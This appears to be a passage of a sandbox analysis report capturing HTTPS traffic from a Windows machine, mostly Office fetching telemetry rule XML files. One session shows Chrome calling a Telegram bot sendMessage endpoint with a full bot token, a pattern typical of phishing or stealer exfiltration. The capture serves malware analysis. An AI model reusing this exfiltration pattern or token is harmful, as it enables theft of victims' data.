                                                          2024-12-03 02:28:03 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          73192.168.2.44982613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:02 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:03 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:02 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 491
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                          ETag: "0x8DC582B98B88612"
                                                          x-ms-request-id: 7e25aef7-c01e-0049-6a05-41ac27000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022802Z-174f7845968frfdmhC1EWRxxbw00000015c0000000008aes
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:03 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          74192.168.2.449829149.154.167.220443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:04 UTC401OUTGET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage HTTP/1.1
                                                          Host: api.telegram.org
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:28:04 UTC346INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.18.0
                                                          Date: Tue, 03 Dec 2024 02:28:04 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 80
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          2024-12-03 02:28:04 UTC80INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d
                                                          Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          75192.168.2.44982813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:04 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:04 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:04 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 479
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                          ETag: "0x8DC582B989EE75B"
                                                          x-ms-request-id: 0fbdb1d5-101e-0079-0270-435913000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022804Z-174f7845968pf68xhC1EWRr4h800000015h000000000ce8z
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:04 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          76192.168.2.44983113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:04 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:05 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:04 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 471
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                          ETag: "0x8DC582B97E6FCDD"
                                                          x-ms-request-id: 691d9d27-b01e-0070-2a0b-411cc0000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022804Z-174f7845968xlwnmhC1EWR0sv8000000154000000000cwz0
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:05 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          77192.168.2.44983013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:04 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:05 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:04 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 415
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                          ETag: "0x8DC582BA80D96A1"
                                                          x-ms-request-id: 9d60b28b-101e-0017-33c7-4347c7000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022804Z-174f78459685m244hC1EWRgp2c000000156g000000004z3y
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:05 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          78192.168.2.44983213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:04 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:05 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:05 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 419
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                          ETag: "0x8DC582B9C710B28"
                                                          x-ms-request-id: 9318b81d-501e-0035-5bd6-43c923000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022805Z-174f7845968frfdmhC1EWRxxbw000000158g00000000kkva
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:05 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          79192.168.2.44983313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:04 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:05 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:05 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 477
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                          ETag: "0x8DC582BA54DCC28"
                                                          x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022805Z-174f7845968cdxdrhC1EWRg0en000000157000000000euh9
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:05 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          80192.168.2.44983413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:06 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:07 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:06 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 419
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                          ETag: "0x8DC582BB7F164C3"
                                                          x-ms-request-id: 2fc5819c-d01e-002b-4a95-4325fb000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022806Z-174f7845968jrjrxhC1EWRmmrs00000015fg000000006t70
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:07 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          81192.168.2.44983513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:06 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:07 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:06 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 477
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                          ETag: "0x8DC582BA48B5BDD"
                                                          x-ms-request-id: f73eacfc-701e-0001-0b91-3fb110000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022806Z-174f7845968kvnqxhC1EWRmf3g0000000s0000000000p04t
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:07 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          82192.168.2.44983613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:06 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:07 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:07 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 419
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                          ETag: "0x8DC582B9FF95F80"
                                                          x-ms-request-id: 27481374-801e-0078-46b4-42bac6000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022807Z-174f7845968px8v7hC1EWR08ng00000015g000000000gyk3
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:07 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          83192.168.2.44983713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:07 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:07 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:07 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 472
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                          ETag: "0x8DC582BB650C2EC"
                                                          x-ms-request-id: abbf3a62-e01e-000c-4c20-458e36000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022807Z-174f7845968cdxdrhC1EWRg0en000000157g00000000e0f8
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:07 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
